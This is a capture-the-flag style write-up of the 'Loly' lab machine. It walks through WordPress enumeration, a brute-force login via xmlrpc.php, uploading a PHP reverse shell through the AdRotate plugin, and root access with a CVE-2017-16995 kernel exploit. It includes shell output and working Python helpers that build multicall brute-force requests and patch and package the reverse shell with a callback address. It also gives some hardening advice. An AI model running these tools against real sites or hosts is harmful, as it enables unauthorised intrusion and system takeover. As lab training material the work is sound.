OSCP - Other Machines - Loly

Key points

  • Path enumeration
  • Privilege escalation via a kernel exploit

Steps

As usual, start with an nmap scan:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-01 07:12 CST
Nmap scan report for loly.lc (172.16.33.25)
Host is up (0.022s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.10.3 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.63 seconds

Enumerating paths on port 80 shows that WordPress is installed; a nikto scan reaches the same conclusion.

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.16.33.25
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wordpress            (Status: 301) [Size: 194] [--> http://172.16.33.25/wordpress/]
Progress: 20476 / 20477 (100.00%)
===============================================================
Finished
===============================================================

Next, run wpscan and enumerate potential users at the same time. It finds the adrotate plugin and the user loly:

[+] adrotate
 | Location: http://loly.lc/wordpress/wp-content/plugins/adrotate/
 | Last Updated: 2024-10-28T17:19:00.000Z
 | [!] The version is out of date, the latest version is 5.13.5
 |
 | Found By: Urls In Homepage (Passive Detection)
......
......
[i] User(s) Identified:

[+] loly
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

Run wpscan again with a wordlist to brute-force loly's password. It succeeds; note from the output that the attack goes through xmlrpc.php rather than the login form. If one wordlist gives nothing, try a few others before reaching for rockyou.txt, which is far too large to be a first choice; keep it for when everything else has failed.

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - loly / fernando
Trying loly / christian Time: 00:00:35
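The "password attack on Xmlrpc" above works by batching many wp.getUsersBlogs authentication calls into one system.multicall request, which is why it is so much faster than posting to wp-login.php. The following is an added example, not part of the original write-up or of wpscan: it builds such a request and parses a response to find the password that worked. The endpoint path, the candidate list and the server response are constructed here for an offline demonstration; only the hostname and the user loly come from the page.

```python
"""Added example: the XML-RPC mechanics behind a WordPress password attack."""
import xmlrpc.client

XMLRPC_URL = "http://loly.lc/wordpress/xmlrpc.php"   # assumed endpoint path


def build_multicall(username, passwords):
    """Return the XML body that tests every candidate in one HTTP request.

    system.multicall packs many wp.getUsersBlogs calls into a single POST;
    each element is a struct {methodName, params}. WordPress answers with one
    result per element, so N passwords cost one round trip.
    """
    calls = [
        {"methodName": "wp.getUsersBlogs", "params": [username, pw]}
        for pw in passwords
    ]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall")


def find_valid_password(response_xml, passwords):
    """Parse a system.multicall response and return the first working password.

    A failed login comes back as a struct {faultCode, faultString}; a success is
    a one-element array holding the user's blog list. Results are positional, so
    result i belongs to passwords[i]. Returns None when every guess failed.
    """
    (results,), _ = xmlrpc.client.loads(response_xml)
    for pw, result in zip(passwords, results):
        if isinstance(result, dict) and "faultCode" in result:
            continue                      # 403 "Incorrect username or password."
        return pw
    return None


# Constructed sample responses (not captured from the target). Real WordPress
# returns the same two shapes: a fault struct, or a list of the user's blogs.
CANDIDATES = ["christian", "fernando123", "fernando"]
_FAULT = {"faultCode": 403, "faultString": "Incorrect username or password."}
SAMPLE_RESPONSE = xmlrpc.client.dumps(([
    _FAULT,
    _FAULT,
    [[{"isAdmin": True, "url": "http://loly.lc/wordpress/", "blogid": "1",
       "blogName": "Loly", "xmlrpc": XMLRPC_URL}]],
],), methodresponse=True)
ALL_FAILED_RESPONSE = xmlrpc.client.dumps(([_FAULT, _FAULT, _FAULT],),
                                          methodresponse=True)

if __name__ == "__main__":
    body = build_multicall("loly", CANDIDATES)
    print(body[:200] + "...")
    print("valid password:", find_valid_password(SAMPLE_RESPONSE, CANDIDATES))
```

On the defensive side this is exactly why hardening guides disable xmlrpc.php (or at least system.multicall) and rate-limit it: a single request can carry hundreds of guesses, and wp-login.php lockout plugins never see them.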

Browsing to the site, the page renders incorrectly. After a little investigation it turns out loly.lc needs to be added to /etc/hosts first; then log in.

AdRotate allows file uploads but restricts the allowed file types. Zip archives are accepted, and they are unpacked on upload.

So create a folder named reverse, copy php-reverse-shell.php into it, edit the callback IP and port, pack the folder into reverse.zip and upload it. The upload succeeds.

The directory where uploaded files are stored is shown under Settings.

Start a listener locally with nc -nlvp 80, then request http://loly.lc/wordpress/wp-content/banners/reverse/php-reverse-shell.php. The reverse shell connects back:

└─$ sudo nc -nlvp 80
[sudo] password for kali: 
listening on [any] 80 ...
connect to [10.8.0.204] from (UNKNOWN) [172.16.33.25] 37790
Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 06:23:14 up 1 day, 23:18,  0 users,  load average: 0.17, 0.13, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
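The three steps above (edit the callback address in php-reverse-shell.php, pack it under a reverse/ directory so AdRotate unpacks it into wp-content/banners/reverse/, then request it) are easy to get subtly wrong, most often by leaving the 127.0.0.1 default in place. This is an added helper, not code from the write-up or from AdRotate: it patches the two configuration lines of pentestmonkey's script, refuses to continue if the defaults are not found, builds the archive and prints the trigger URL. The listener address 10.8.0.204:80 and the banners path are taken from the page; the two-line PHP excerpt is constructed here as a stand-in for the real file (which uses exactly those default lines).

```python
"""Added example: patch php-reverse-shell.php, pack it for AdRotate, derive the URL."""
import io
import re
import zipfile

# Constructed stand-in for the real file's configuration lines; in practice read
# /usr/share/webshells/php/php-reverse-shell.php from Kali instead.
SAMPLE_SHELL_EXCERPT = """<?php
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
"""


def patch_reverse_shell(source, lhost, lport):
    """Replace the default callback address and port.

    Raises if either default line is missing, because a shell that still says
    127.0.0.1 uploads fine and then silently connects to the web server itself.
    """
    patched, n_ip = re.subn(r"\$ip = '127\.0\.0\.1';", f"$ip = '{lhost}';", source)
    patched, n_port = re.subn(r"\$port = 1234;", f"$port = {lport};", patched)
    if n_ip != 1 or n_port != 1:
        raise ValueError("expected exactly one $ip and one $port default line")
    return patched


def build_banner_zip(shell_source, folder="reverse", name="php-reverse-shell.php"):
    """Return the bytes of a zip whose only entry is folder/name.

    AdRotate extracts the archive into its banner directory, so the folder
    inside the zip becomes a sub-directory of wp-content/banners/.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{folder}/{name}", shell_source)
    return buf.getvalue()


def trigger_url(base="http://loly.lc/wordpress", banners="wp-content/banners",
                folder="reverse", name="php-reverse-shell.php"):
    """URL to request once the archive is uploaded; the banners path is the one
    shown in AdRotate's Settings on this machine and is assumed unchanged."""
    return f"{base}/{banners}/{folder}/{name}"


def zip_entries(zip_bytes):
    """List the paths inside an archive, for checking before uploading."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return zf.namelist()


if __name__ == "__main__":
    shell = patch_reverse_shell(SAMPLE_SHELL_EXCERPT, "10.8.0.204", 80)
    archive = build_banner_zip(shell)
    with open("reverse.zip", "wb") as fh:
        fh.write(archive)
    print("entries:", zip_entries(archive))
    print("after upload, start `nc -nlvp 80` and request", trigger_url())
```

Port 80 is chosen for the callback because outbound HTTP is the connection least likely to be blocked by egress filtering; if the shell never arrives, check the listener is running before re-uploading.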

sudo -l and a search for SUID binaries turn up nothing, but the linpeas output shows a kernel version that should be vulnerable. A quick search leads to https://github.com/rlarabee/exploits/blob/master/cve-2017-16995/cve-2017-16995.c

══════════════════════════════╣ System Information ╠══════════════════════════════
                              ╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 4.4.0-31-generic (buildd@lgw01-16) (gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2.1) ) #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016
Distributor ID: Ubuntu
Description:    Ubuntu 16.04.1 LTS
Release:        16.04
Codename:       xenial

Download the source, compile it locally (the target is x86_64, as uname showed), upload the binary to the target and run it. Privilege escalation succeeds:

www-data@ubuntu:/tmp$ ./cve-2017-16995
./cve-2017-16995
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880035088a00
[*] Leaking sock struct from ffff8800351aaf00
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff8800358f60c0
[*] UID from cred structure: 33, matches the current: 33
[*] hammering cred structure at ffff8800358f60c0
[*] credentials patched, launching shell...
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cat /root/root.txt
cat /root/root.txt
  ____               ____ ____  ____  
 / ___| _   _ _ __  / ___/ ___||  _ \ 
 \___ \| | | | '_ \| |   \___ \| |_) |
  ___) | |_| | | | | |___ ___) |  _ < 
 |____/ \__,_|_| |_|\____|____/|_| \_\
                                      
Congratulations. I'm BigCityBoy
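Before compiling and transferring a kernel exploit it is worth confirming its preconditions from the shell you already have. CVE-2017-16995 is a bug in the eBPF verifier reached through the bpf() syscall from an unprivileged process, so besides an unpatched kernel it needs kernel.unprivileged_bpf_disabled to be 0 (the exploit's own output above shows it loading a BPF program as uid 33). The following is an added example, not part of the write-up or of the exploit: it parses the kernel string from the linpeas output on the page and the sysctl value, and combines them. The "fixed ABI" threshold is an operator-supplied number to be looked up on the distribution's CVE tracker; the 116 used in the demo call is illustrative, not a value this script vouches for.

```python
"""Added example: check the preconditions of an unprivileged-BPF kernel exploit."""
import re

# Copied from the linpeas output on the page.
PROC_VERSION = ("Linux version 4.4.0-31-generic (buildd@lgw01-16) "
                "(gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2.1) ) "
                "#50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016")


def parse_ubuntu_kernel(proc_version):
    """Return (major, minor, patch, abi) from an Ubuntu-style kernel string,
    e.g. 'Linux version 4.4.0-31-generic ...' -> (4, 4, 0, 31)."""
    m = re.search(r"Linux version (\d+)\.(\d+)\.(\d+)-(\d+)-", proc_version)
    if not m:
        raise ValueError("not an Ubuntu-style kernel version string")
    return tuple(int(x) for x in m.groups())


def unprivileged_bpf_allowed(sysctl_value):
    """Interpret kernel.unprivileged_bpf_disabled: 0 allows bpf() for any
    user, anything else blocks it. None (file absent) means a kernel older
    than 4.4 without the knob, which has no eBPF verifier to attack anyway."""
    if sysctl_value is None:
        return False
    return sysctl_value.strip() == "0"


def exploit_preconditions(proc_version, sysctl_value, fixed_abi):
    """Combine both checks. fixed_abi is the first patched Ubuntu 4.4.0 ABI
    number (operator-supplied, from the distro CVE tracker); lower ABIs in
    the 4.4.0 series are treated as unpatched."""
    ver = parse_ubuntu_kernel(proc_version)
    unpatched = ver[:3] == (4, 4, 0) and ver[3] < fixed_abi
    bpf_ok = unprivileged_bpf_allowed(sysctl_value)
    return {
        "kernel": ver,
        "unpatched_4_4_series": unpatched,
        "unprivileged_bpf": bpf_ok,
        "worth_trying": unpatched and bpf_ok,
    }


def read_sysctl(path="/proc/sys/kernel/unprivileged_bpf_disabled"):
    """Read the live value on the target; None if the knob does not exist."""
    try:
        with open(path) as fh:
            return fh.read()
    except OSError:
        return None


if __name__ == "__main__":
    # fixed_abi=116 is illustrative only: replace it with the tracker's value.
    report = exploit_preconditions(PROC_VERSION, read_sysctl(), fixed_abi=116)
    for key, value in report.items():
        print(f"{key}: {value}")
```

The same two checks are the defender's fix list for this machine: apply the kernel update, and set kernel.unprivileged_bpf_disabled=1 so that a web-server account cannot reach the verifier at all, whether or not a patch is in place. The exploit's own banner also records the other caveat: it does not work on genuine grsecurity kernels.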
